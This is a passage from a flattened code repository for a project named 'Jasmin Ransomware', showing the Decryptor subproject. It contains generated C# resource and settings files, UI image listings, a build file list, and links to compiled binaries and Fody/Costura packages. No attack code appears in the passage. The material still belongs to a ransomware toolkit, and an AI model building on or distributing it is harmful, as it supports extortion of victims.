ResourceManager.GetObject("buttuon4", resourceCulture); 79 | return ((System.Drawing.Bitmap)(obj)); 80 | } 81 | } 82 | 83 | /// 84 | /// Looks up a localized resource of type System.Drawing.Bitmap. 85 | /// 86 | internal static System.Drawing.Bitmap close_button { 87 | get { 88 | object obj = ResourceManager.GetObject("close button", resourceCulture); 89 | return ((System.Drawing.Bitmap)(obj)); 90 | } 91 | } 92 | 93 | /// 94 | /// Looks up a localized resource of type System.Drawing.Bitmap. 95 | /// 96 | internal static System.Drawing.Bitmap flora_BLACK { 97 | get { 98 | object obj = ResourceManager.GetObject("flora BLACK", resourceCulture); 99 | return ((System.Drawing.Bitmap)(obj)); 100 | } 101 | } 102 | 103 | /// 104 | /// Looks up a localized resource of type System.Drawing.Bitmap. 105 | /// 106 | internal static System.Drawing.Bitmap fotter { 107 | get { 108 | object obj = ResourceManager.GetObject("fotter", resourceCulture); 109 | return ((System.Drawing.Bitmap)(obj)); 110 | } 111 | } 112 | 113 | /// 114 | /// Looks up a localized resource of type System.Drawing.Bitmap. 115 | /// 116 | internal static System.Drawing.Bitmap header3 { 117 | get { 118 | object obj = ResourceManager.GetObject("header3", resourceCulture); 119 | return ((System.Drawing.Bitmap)(obj)); 120 | } 121 | } 122 | 123 | /// 124 | /// Looks up a localized resource of type System.Drawing.Bitmap. 125 | /// 126 | internal static System.Drawing.Bitmap icon { 127 | get { 128 | object obj = ResourceManager.GetObject("icon", resourceCulture); 129 | return ((System.Drawing.Bitmap)(obj)); 130 | } 131 | } 132 | 133 | /// 134 | /// Looks up a localized resource of type System.Drawing.Bitmap. 135 | /// 136 | internal static System.Drawing.Bitmap invaild_key { 137 | get { 138 | object obj = ResourceManager.GetObject("invaild key", resourceCulture); 139 | return ((System.Drawing.Bitmap)(obj)); 140 | } 141 | } 142 | 143 | /// 144 | /// Looks up a localized resource of type System.Drawing.Bitmap. 145 | /// 146 | internal static System.Drawing.Bitmap line { 147 | get { 148 | object obj = ResourceManager.GetObject("line", resourceCulture); 149 | return ((System.Drawing.Bitmap)(obj)); 150 | } 151 | } 152 | 153 | /// 154 | /// Looks up a localized resource of type System.Drawing.Bitmap. 155 | /// 156 | internal static System.Drawing.Bitmap loading { 157 | get { 158 | object obj = ResourceManager.GetObject("loading", resourceCulture); 159 | return ((System.Drawing.Bitmap)(obj)); 160 | } 161 | } 162 | 163 | /// 164 | /// Looks up a localized resource of type System.Drawing.Bitmap. 165 | /// 166 | internal static System.Drawing.Bitmap minimize { 167 | get { 168 | object obj = ResourceManager.GetObject("minimize", resourceCulture); 169 | return ((System.Drawing.Bitmap)(obj)); 170 | } 171 | } 172 | 173 | /// 174 | /// Looks up a localized resource of type System.Drawing.Bitmap. 175 | /// 176 | internal static System.Drawing.Bitmap not_found { 177 | get { 178 | object obj = ResourceManager.GetObject("not found", resourceCulture); 179 | return ((System.Drawing.Bitmap)(obj)); 180 | } 181 | } 182 | 183 | /// 184 | /// Looks up a localized resource of type System.Drawing.Bitmap. 185 | /// 186 | internal static System.Drawing.Bitmap report { 187 | get { 188 | object obj = ResourceManager.GetObject("report", resourceCulture); 189 | return ((System.Drawing.Bitmap)(obj)); 190 | } 191 | } 192 | 193 | /// 194 | /// Looks up a localized resource of type System.Drawing.Bitmap. 195 | /// 196 | internal static System.Drawing.Bitmap verified { 197 | get { 198 | object obj = ResourceManager.GetObject("verified", resourceCulture); 199 | return ((System.Drawing.Bitmap)(obj)); 200 | } 201 | } 202 | } 203 | } 204 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 122 | ..\Resources\header3.PNG;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 123 | 124 | 125 | ..\Resources\loading.gif;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 126 | 127 | 128 | ..\Resources\icon.gif;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 129 | 130 | 131 | ..\Resources\verified.jpg;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 132 | 133 | 134 | ..\Resources\close button.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 135 | 136 | 137 | ..\Resources\flora BLACK.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 138 | 139 | 140 | ..\Resources\invaild key.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 141 | 142 | 143 | ..\Resources\buttuon3.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 144 | 145 | 146 | ..\Resources\buttuon4.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 147 | 148 | 149 | ..\Resources\not found.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 150 | 151 | 152 | ..\Resources\line1.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 153 | 154 | 155 | ..\Resources\minimize.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 156 | 157 | 158 | ..\Resources\fotter.PNG;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 159 | 160 | 161 | ..\Resources\report.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 162 | 163 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace Neki_Decrypter.Properties { 12 | 13 | 14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "16.4.0.0")] 16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase { 17 | 18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 19 | 20 | public static Settings Default { 21 | get { 22 | return defaultInstance; 23 | } 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/buttuon3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/buttuon3.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/buttuon4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/buttuon4.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/close button.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/close button.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/flora BLACK.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/flora BLACK.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/fotter.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/fotter.PNG -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/header3.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/header3.PNG -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/icon.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/icon.gif -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/invaild key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/invaild key.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/line.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/line.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/line1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/line1.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/loading.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/loading.gif -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/minimize.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/minimize.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/not found.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/not found.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/report.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/report.png -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/verified.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/verified.jpg -------------------------------------------------------------------------------- /Jasmin Decryptor/Resources/wait cat 2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Resources/wait cat 2.gif -------------------------------------------------------------------------------- /Jasmin Decryptor/app.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Jasmin Decryptor/bin/Release/Jasmin Decryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/bin/Release/Jasmin Decryptor.exe -------------------------------------------------------------------------------- /Jasmin Decryptor/bin/Release/Jasmin Decryptor.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Jasmin Decryptor/bin/Release/Jasmin Decryptor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/bin/Release/Jasmin Decryptor.pdb -------------------------------------------------------------------------------- /Jasmin Decryptor/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed -------------------------------------------------------------------------------- /Jasmin Decryptor/obj/Release/Jasmin Decryptor.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\cyberstair\Desktop\Jasmin Ransomware Final\Jasmin Decryptor\obj\Release\Jasmin Decryptor.exe 2 | C:\Users\cyberstair\Desktop\Jasmin Ransomware Final\Jasmin Decryptor\bin\Release\Jasmin Decryptor.exe.config 3 | C:\Users\cyberstair\Desktop\Jasmin Ransomware Final\Jasmin Decryptor\bin\Release\Jasmin Decryptor.exe 4 | C:\Users\cyberstair\Desktop\Jasmin Ransomware Final\Jasmin Decryptor\bin\Release\Jasmin Decryptor.pdb 5 | C:\Users\cyberstair\Desktop\Jasmin Ransomware Final\Jasmin Decryptor\obj\Release\Jasmin_Decryptor.mainform.resources 6 | C:\Users\cyberstair\Desktop\Jasmin Ransomware Final\Jasmin Decryptor\obj\Release\Jasmin_Decryptor.Properties.Resources.resources 7 | C:\Users\cyberstair\Desktop\Jasmin Ransomware Final\Jasmin Decryptor\obj\Release\Jasmin Decryptor.csproj.GenerateResource.cache 8 | C:\Users\cyberstair\Desktop\Jasmin Ransomware Final\Jasmin Decryptor\obj\Release\Jasmin Decryptor.csproj.Fody.CopyLocal.cache 9 | C:\Users\cyberstair\Desktop\Jasmin Ransomware Final\Jasmin Decryptor\obj\Release\Jasmin Decryptor.pdb 10 | -------------------------------------------------------------------------------- /Jasmin Decryptor/obj/Release/Jasmin Decryptor.csproj.Fody.CopyLocal.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/obj/Release/Jasmin Decryptor.csproj.Fody.CopyLocal.cache -------------------------------------------------------------------------------- /Jasmin Decryptor/obj/Release/Jasmin Decryptor.csproj.GenerateResource.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/obj/Release/Jasmin Decryptor.csproj.GenerateResource.cache -------------------------------------------------------------------------------- /Jasmin Decryptor/obj/Release/Jasmin Decryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/obj/Release/Jasmin Decryptor.exe -------------------------------------------------------------------------------- /Jasmin Decryptor/obj/Release/Jasmin Decryptor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/obj/Release/Jasmin Decryptor.pdb -------------------------------------------------------------------------------- /Jasmin Decryptor/obj/Release/Jasmin_Decryptor.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/obj/Release/Jasmin_Decryptor.Properties.Resources.resources -------------------------------------------------------------------------------- /Jasmin Decryptor/obj/Release/Jasmin_Decryptor.mainform.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/obj/Release/Jasmin_Decryptor.mainform.resources -------------------------------------------------------------------------------- /Jasmin Decryptor/packages.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Costura.Fody.4.1.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Costura.Fody.4.1.0/.signature.p7s -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Costura.Fody.4.1.0/Costura.Fody.4.1.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Costura.Fody.4.1.0/Costura.Fody.4.1.0.nupkg -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Costura.Fody.4.1.0/build/Costura.Fody.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Costura.Fody.4.1.0/lib/net40/Costura.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Costura 5 | 6 | 7 | 8 | 9 | Contains methods for interacting with the Costura system. 10 | 11 | 12 | 13 | 14 | Call this to Initialize the Costura system. 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.xcf: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 7 | 8 | 9 | 10 | 11 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 12 | 13 | 14 | 15 | 16 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks. 17 | 18 | 19 | 20 | 21 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks. 22 | 23 | 24 | 25 | 26 | The order of preloaded assemblies, delimited with line breaks. 27 | 28 | 29 | 30 | 31 | 32 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. 33 | 34 | 35 | 36 | 37 | Controls if .pdbs for reference assemblies are also embedded. 38 | 39 | 40 | 41 | 42 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. 43 | 44 | 45 | 46 | 47 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. 48 | 49 | 50 | 51 | 52 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. 53 | 54 | 55 | 56 | 57 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. 58 | 59 | 60 | 61 | 62 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 63 | 64 | 65 | 66 | 67 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. 68 | 69 | 70 | 71 | 72 | A list of unmanaged 32 bit assembly names to include, delimited with |. 73 | 74 | 75 | 76 | 77 | A list of unmanaged 64 bit assembly names to include, delimited with |. 78 | 79 | 80 | 81 | 82 | The order of preloaded assemblies, delimited with |. 83 | 84 | 85 | -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/.signature.p7s -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/Fody.6.0.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/Fody.6.0.0.nupkg -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/build/Fody.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(ProjectDir)FodyWeavers.xml 5 | $(MSBuildThisFileDirectory)..\ 6 | $(FodyPath)netstandardtask 7 | $(FodyPath)netclassictask 8 | $(FodyAssemblyDirectory)\Fody.dll 9 | $(DefaultItemExcludes);FodyWeavers.xsd 10 | true 11 | 15 12 | $([System.Version]::Parse($(MSBuildVersion)).Major) 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 37 | 38 | 40 | 59 | 60 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 76 | 77 | 81 | 82 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 100 | 101 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Fody.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Fody.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/FodyCommon.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/FodyCommon.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/FodyHelpers.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/FodyHelpers.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/FodyIsolated.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/FodyIsolated.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.pdb -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.pdb -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netclassictask/Mono.Cecil.pdb -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Fody.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Fody.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/FodyCommon.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/FodyCommon.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/FodyHelpers.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/FodyHelpers.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/FodyIsolated.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/FodyIsolated.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.pdb -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.pdb -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.dll -------------------------------------------------------------------------------- /Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.pdb -------------------------------------------------------------------------------- /Jasmin Encrypter/.vs/Jasmin Encryptor/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/.vs/Jasmin Encryptor/v16/.suo -------------------------------------------------------------------------------- /Jasmin Encrypter/.vs/Jasmin Encryptor/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- 